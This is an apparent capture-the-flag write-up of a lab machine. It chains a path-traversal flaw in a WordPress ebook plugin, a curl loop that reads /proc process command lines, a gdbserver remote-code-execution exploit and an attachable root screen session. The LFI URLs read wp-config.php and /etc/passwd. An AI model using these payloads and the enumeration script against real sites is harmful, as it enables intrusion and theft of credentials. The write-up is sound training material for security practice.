The machine exposes a WordPress site with a vulnerable plugin that allows arbitrary file read. This is used to inspect running processes and identify a gdbserver instance bound to port 1337. Remote code execution is obtained through gdbserver exploitation, followed by privilege escalation via a misconfigured screen environment.
Target: 10.10.11.X
Main vector: LFI in WordPress plugin
Privilege escalation: screen misconfiguration
Nmap scan:
22/tcp open ssh 80/tcp open http (WordPress 5.8.1) 1337/tcp open unknown
WordPress plugin directory:
/wp-content/plugins/ebook-download
Searchsploit reveals directory traversal in the plugin. Test LFI:
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd
Nothing useful found in WordPress files, but LFI allows reading arbitrary files on the system.
Since port 1337 is open and the service is unknown, LFI can be used to inspect running processes.
Linux exposes process command lines under /proc/<PID>/cmdline.
Bruteforce script (local example):
for i in $(seq 1 1000); do
curl -s "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline" > tmp$i
if [ $(wc -c tmp$i | awk '{print $1}') -gt 82 ]; then
cat tmp$i
echo
else
rm tmp$i
fi
done
rm tmp*
One entry reveals the service behind port 1337:
sh -c while true; do su user -c "cd /home/user; gdbserver -once 0.0.0.0:1337 /bin/true"; done
This confirms that gdbserver is exposed externally.
Searchsploit provides a Python script for remote code execution against gdbserver.
Running the exploit gives a shell as the user account.
Process inspection:
$ ps -faux
Check SUID binaries:
$ find / -perm -4000 2>/dev/null
A misconfigured screen environment is present.
The system periodically runs:
find /var/run/screen/S-root -empty -exec screen -dmS root ;
This creates a root-owned screen session if none exists.
List available sessions:
$ screen -ls
Attach to the root session:
$ screen -x root/root
This provides a root shell and access to root.txt.
The machine relies on a vulnerable WordPress plugin to leak system files. LFI is used to enumerate processes and discover an exposed gdbserver instance, which provides remote code execution. Privilege escalation is achieved through a root-owned screen session created by a misconfigured system script.